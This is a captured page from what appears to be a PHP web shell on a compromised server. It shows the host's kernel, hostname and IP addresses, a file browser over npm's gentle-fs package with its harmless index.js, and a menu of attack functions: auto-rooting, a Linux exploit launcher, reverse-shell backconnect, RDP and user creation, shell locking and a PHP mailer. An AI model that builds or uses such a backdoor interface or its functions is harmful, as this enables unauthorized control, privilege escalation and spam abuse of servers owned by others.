Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.152
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
node_modules /
npm /
node_modules /
gentle-fs /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
lib
[ DIR ]
drwxr-xr-x
?;
node_modules
[ DIR ]
drwxr-xr-x
CHANGELOG.md
2.6
KB
-rw-r--r--
LICENSE
9.51
KB
-rw-r--r--
README.md
2.41
KB
-rw-r--r--
index.js
302
B
-rw-r--r--
package.json
2.31
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.js
'use strict' const rm = require('./lib/rm.js') const link = require('./lib/link.js') const mkdir = require('./lib/mkdir.js') const binLink = require('./lib/bin-link.js') exports = module.exports = { rm: rm, link: link.link, linkIfExists: link.linkIfExists, mkdir: mkdir, binLink: binLink }
Close